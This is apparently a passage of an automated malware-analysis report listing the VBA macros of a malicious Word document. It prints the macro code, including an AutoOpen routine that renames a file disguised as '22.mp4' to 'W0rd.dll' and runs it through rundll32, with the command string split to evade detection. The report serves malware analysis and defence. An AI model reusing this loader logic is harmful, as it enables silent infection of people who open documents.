82 | End Function |

APIs | Meta Information
AttachedTemplate
ActiveDocument

Line | Instruction | Meta Information
86 | Sub lka(UUu as String) |
87 | Name UUu & "\22.mp4" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll" | AttachedTemplate, ActiveDocument
89 | End Sub |

                                                                                                                                                        Module: Module2

                                                                                                                                                        Declaration
Line | Content
1 | Attribute VB_Name = "Module2"

Non-Executed Functions

APIs | Meta Information
MoveDown
wdLine
MoveRight
wdCharacter
MoveDown
wdLine
MoveRight
wdCharacter
MoveDown
wdLine
MoveRight
wdCharacter
MoveDown
wdLine
MoveRight
wdCharacter
TypeBackspace
Copy

Line | Instruction | Meta Information
2 | Sub oo() |
3 | Selection.MoveDown Unit := wdLine, Count := 1 | MoveDown, wdLine
4 | Selection.MoveRight Unit := wdCharacter, Count := 5 | MoveRight, wdCharacter
5 | Selection.MoveDown Unit := wdLine, Count := 24 | MoveDown, wdLine
6 | Selection.MoveRight Unit := wdCharacter, Count := 50 | MoveRight, wdCharacter
7 | Selection.MoveDown Unit := wdLine, Count := 24 | MoveDown, wdLine
8 | Selection.MoveRight Unit := wdCharacter, Count := 5 | MoveRight, wdCharacter
9 | Selection.MoveDown Unit := wdLine, Count := 24 | MoveDown, wdLine
10 | Selection.MoveRight Unit := wdCharacter, Count := 50 | MoveRight, wdCharacter
11 | Selection.TypeBackspace | TypeBackspace
12 | Selection.Copy | Copy
14 | End Sub |

APIs | Meta Information
Dir
Dir
AttachedTemplate
ActiveDocument
AttachedTemplate
ActiveDocument

Strings | Decrypted Strings
""""
""""
Line | Instruction | Meta Information
18 | Sub zxc(sf as String) |
19 | strFileExists = Dir(sf & "\22.mp4") | Dir
21 | If strFileExists = "" Then |
23 | Else |
24 | If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then | Dir, AttachedTemplate, ActiveDocument
26 | Name sf & "\22.mp4" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll" | AttachedTemplate, ActiveDocument
27 | Else |
28 | Exit Sub |
29 | Endif |
31 | Endif |
32 | End Sub |

Module: ThisDocument

Declaration
Line | Content
1 | Attribute VB_Name = "ThisDocument"
2 | Attribute VB_Base = "1Normal.ThisDocument"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = True
8 | Attribute VB_Customizable = True

Non-Executed Functions

APIs | Meta Information
Part of subcall function ssss@Module1: Dir
Part of subcall function ssss@Module1: Left
Part of subcall function ssss@Module1: AttachedTemplate
Part of subcall function ssss@Module1: ActiveDocument
Part of subcall function ssss@Module1: vbDirectory
Part of subcall function ssss@Module1: Left
Part of subcall function ssss@Module1: AttachedTemplate
Part of subcall function ssss@Module1: ActiveDocument
Part of subcall function ssss@Module1: TypeBackspace
Dir
AttachedTemplate
ActiveDocument
Shell
Shell32
ShellExecute
AttachedTemplate
ActiveDocument
SW_SHOWNORMAL

Strings | Decrypted Strings
""""
" "
"rund""ll""32.exe"
Line | Instruction | Meta Information
11 | Sub AutoOpen() |
12 | Call ssss() |
14 | If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then | Dir, AttachedTemplate, ActiveDocument
15 | Else |
17 | Dim a as New Shell32.Shell | Shell, Shell32
18 | Dim Scr_hDC as Long |
19 | Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL) | ShellExecute, AttachedTemplate, ActiveDocument, SW_SHOWNORMAL
20 | Endif |
21 | End Sub |
